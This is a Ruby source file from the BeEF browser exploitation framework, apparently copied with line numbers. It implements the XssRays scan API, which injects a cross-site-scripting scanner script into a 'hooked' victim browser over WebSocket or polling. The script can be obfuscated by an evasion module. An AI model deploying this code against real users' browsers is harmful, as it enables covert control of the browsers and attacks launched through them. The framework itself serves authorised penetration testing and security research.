1
#
2
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
# Browser Exploitation Framework (BeEF) - https://beefproject.com
4
# See the file 'doc/COPYING' for copying permission
5
#
6
module BeEF
7
  module Extension
8
    module Xssrays
9
      module API
10
        class Scan
11
          include BeEF::Core::Handlers::Modules::BeEFJS
12

13
          #
14
          # Add the xssrays main JS file to the victim DOM if there is a not-yet-started scan entry in the db.
15
          #
16
          def start_scan(hb, body)
17
            @body = body
18
            config = BeEF::Core::Configuration.instance
19
            hb = BeEF::Core::Models::HookedBrowser.find(hb.id)
20
            # TODO: we should get the xssrays_scan table with more accuracy, if for some reasons we requested
21
            # TODO: 2 scans on the same hooked browsers, "first" could not get the right result we want
22
            xs = BeEF::Core::Models::Xssraysscan.where(hooked_browser_id: hb.id, is_started: false).first
23

24
            # stop here if there are no XssRays scans to be started
25
            return if xs.nil? || xs.is_started == true
26

27
            # set the scan as started
28
            xs.update(is_started: true)
29

30
            # build the beefjs xssrays component
31

32
            # the URI of the XssRays handler where rays should come back if the vulnerability is verified
33
            beefurl = BeEF::Core::Server.instance.url
34
            cross_origin = xs.cross_origin
35
            timeout = xs.clean_timeout
36

37
            ws = BeEF::Core::Websocket::Websocket.instance
38

39
            # TODO: antisnatchor: prevent sending "content" multiple times.
40
            #                    Better leaving it after the first run, and don't send it again.
41
            # todo antisnatchor: remove this gsub crap adding some hook packing.
42

43
            # If we use WebSockets, just reply wih the component contents
44
            if config.get('beef.http.websocket.enable') && ws.getsocket(hb.session)
45
              content = File.read(find_beefjs_component_path('beef.net.xssrays')).gsub('//
46
              //   Copyright (c) 2006-2025Wade Alcorn - [email protected]
47
              //   Browser Exploitation Framework (BeEF) - https://beefproject.com
48
              //   See the file \'doc/COPYING\' for copying permission
49
              //', '')
50
              add_to_body xs.id, hb.session, beefurl, cross_origin, timeout
51

52
              if config.get('beef.extension.evasion.enable')
53
                evasion = BeEF::Extension::Evasion::Evasion.instance
54
                ws.send(evasion.obfuscate(content) + @body, hb.session)
55
              else
56
                ws.send(content + @body, hb.session)
57
              end
58
            # If we use XHR-polling, add the component to the main hook file
59
            else
60
              build_missing_beefjs_components 'beef.net.xssrays'
61
              add_to_body xs.id, hb.session, beefurl, cross_origin, timeout
62
            end
63

64
            print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}], cross origin [#{cross_origin}], clean timeout [#{timeout}].")
65
          end
66

67
          def add_to_body(id, session, beefurl, cross_origin, timeout)
68
            config = BeEF::Core::Configuration.instance
69

70
            req = %{
71
              beef.execute(function() {
72
                beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_origin}, #{timeout});
73
              });
74
            }
75

76
            if config.get('beef.extension.evasion.enable')
77
              evasion = BeEF::Extension::Evasion::Evasion.instance
78
              @body << evasion.obfuscate(req)
79
            else
80
              @body << req
81
            end
82
          end
83
        end
84
      end
85
    end
86
  end
87
end
88

89